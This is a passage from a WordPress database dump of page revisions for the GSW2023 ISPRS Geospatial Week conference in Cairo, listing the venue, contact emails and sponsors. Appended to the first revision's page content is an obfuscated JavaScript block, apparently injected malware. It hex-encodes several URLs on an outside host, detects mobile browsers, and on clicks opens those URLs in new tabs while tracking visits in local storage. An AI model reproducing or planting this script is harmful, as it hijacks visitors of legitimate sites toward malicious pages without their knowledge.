margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-24 01:36:23','2023-06-24 01:36:23','',3066,'https://gsw2023.com/?p=4796',0,'revision','',0),
(4797,1,'2023-06-24 01:37:03','2023-06-24 01:37:03','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219262706{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219711400{margin-top: 90px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096263968{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686350035719{margin-top: 190px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button 